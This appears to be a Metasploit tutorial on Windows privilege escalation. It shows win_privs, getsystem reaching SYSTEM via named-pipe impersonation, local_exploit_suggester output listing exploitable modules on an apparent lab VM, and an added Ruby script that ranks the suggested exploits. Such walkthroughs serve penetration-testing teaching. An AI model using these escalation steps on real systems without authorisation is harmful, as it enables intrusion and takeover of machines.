[MAD-METASPLOIT] 0x32 - Privilege Escalation

Checking privileges with win_privs

Before trying to escalate, check what the current session's token can already do. The post module lists the user's admin/SYSTEM status, local Administrators membership, UAC state, and the Windows privileges held by the token:

post/windows/gather/win_privs

meterpreter > run post/windows/gather/win_privs

Current User
============

 Is Admin  Is System  Is In Local Admin Group  UAC Enabled  Foreground ID  UID
 --------  ---------  -----------------------  -----------  -------------  ---
 False     False      True                     False        1              "HAHWUL\Test-Virtualbox"

Windows Privileges
==================

 Name
 ----
 SeChangeNotifyPrivilege

Is Admin and Is System are both False, and the token carries only SeChangeNotifyPrivilege (granted to every user by default), so there is no privilege such as SeImpersonatePrivilege or SeDebugPrivilege to abuse directly. The next step is to let getsystem try its built-in techniques.

Automatic privilege escalation with getsystem

getsystem attempts its techniques in order (technique 0, the default, tries all of them) and stops at the first one that yields a SYSTEM token:

meterpreter > getsystem -h
Usage: getsystem [options]

Attempt to elevate your privilege to that of local system.

OPTIONS:

    -h        Help Banner.
    -t <opt>  The technique to use. (Default to '0').
                0 : All techniques available
                1 : Named Pipe Impersonation (In Memory/Admin)
                2 : Named Pipe Impersonation (Dropper/Admin)
                3 : Token Duplication (In Memory/Admin)

meterpreter > getsystem

...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).

Confirm the result with getuid (the session should now report NT AUTHORITY\SYSTEM) before moving on. If none of the techniques succeeds, the session needs a local exploit instead.

Finding local exploits with local_exploit_suggester

When getsystem is not enough, local_exploit_suggester runs the check method of every local exploit that matches the session's platform and architecture. It reports two kinds of result as [+]: "The target appears to be vulnerable." means the check found the vulnerable component and version, while "The target service is running, but could not be validated." means only that the affected component is present, so those modules should be tried after the confirmed ones.

meterpreter > run post/multi/recon/local_exploit_suggester

[*] 192.168.56.101 - Collecting local exploits for x86/windows...

[*] 192.168.56.101 - 37 exploit checks are being tried...

[+] 192.168.56.101 - exploit/windows/local/ms10_015_kitrap0d: The target service is running, but could not be validated.

[+] 192.168.56.101 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.

[+] 192.168.56.101 - exploit/windows/local/ms13_053_schlamperei: The target appears to be vulnerable.

[+] 192.168.56.101 - exploit/windows/local/ms13_081_track_popup_menu: The target appears to be vulnerable.

[+] 192.168.56.101 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.

[+] 192.168.56.101 - exploit/windows/local/ms15_004_tswbproxy: The target service is running, but could not be validated.

[+] 192.168.56.101 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.

[+] 192.168.56.101 - exploit/windows/local/ms16_016_webdav: The target service is running, but could not be validated.

[+] 192.168.56.101 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The target service is running, but could not be validated.

[+] 192.168.56.101 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
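As an added example (not code from the original post or from Metasploit), the Ruby script below parses local_exploit_suggester output like the listing above and orders the candidates so modules whose check confirmed the vulnerability are tried before the ones it could only detect. SUGGESTER_OUTPUT is a constructed sample shaped like the listing; parse_suggester, prioritize and summarize are names chosen here.

```ruby
# Added example: triage helper for local_exploit_suggester output.
# Not part of the original post or of Metasploit. It parses the
# "[+] <host> - <module>: <verdict>" lines the module prints and orders
# the candidate exploits so confirmed hits are tried before unvalidated ones.

# Constructed sample, shaped like the suggester output in the post.
SUGGESTER_OUTPUT = <<~OUT
  [*] 192.168.56.101 - Collecting local exploits for x86/windows...
  [*] 192.168.56.101 - 37 exploit checks are being tried...
  [+] 192.168.56.101 - exploit/windows/local/ms10_015_kitrap0d: The target service is running, but could not be validated.
  [+] 192.168.56.101 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
  [+] 192.168.56.101 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The target service is running, but could not be validated.
  [+] 192.168.56.101 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
OUT

# Messages the suggester prints for the two check results it reports as "[+]".
VERDICTS = {
  "The target appears to be vulnerable."                        => :vulnerable,
  "The target service is running, but could not be validated." => :unvalidated,
}.freeze

Finding = Struct.new(:host, :mod, :verdict)

# Parse only the "[+]" result lines; "[*]" status lines are skipped.
# Unknown messages are kept with verdict :unknown rather than dropped.
def parse_suggester(text)
  text.each_line.filter_map do |line|
    m = line.match(%r{\A\[\+\]\s+(\S+)\s+-\s+(exploit/\S+?):\s+(.+?)\s*\z})
    next unless m
    Finding.new(m[1], m[2], VERDICTS.fetch(m[3], :unknown))
  end
end

RANK = { vulnerable: 0, unvalidated: 1, unknown: 2 }.freeze

# Confirmed hits first, then modules whose check was inconclusive; within a
# verdict keep the suggester's own order so the result is deterministic.
def prioritize(findings)
  findings.sort_by.with_index { |f, i| [RANK.fetch(f.verdict, 3), i] }
end

# Count findings per verdict, e.g. { vulnerable: 2, unvalidated: 2 }.
def summarize(findings)
  findings.each_with_object(Hash.new(0)) { |f, h| h[f.verdict] += 1 }
end

if __FILE__ == $PROGRAM_NAME
  findings = prioritize(parse_suggester(SUGGESTER_OUTPUT))
  puts summarize(findings).inspect
  findings.each { |f| puts "#{f.verdict.to_s.ljust(11)} #{f.mod}" }
end
```

Run it with `ruby triage.rb` (any file name works) and it prints the two confirmed modules, ms10_092_schelevator and ppr_flatten_rec, ahead of the two that could only be detected. Feeding it a real session's output means pasting the suggester lines into SUGGESTER_OUTPUT or reading them from a file; the regex only depends on the fixed "[+] host - module: message" layout.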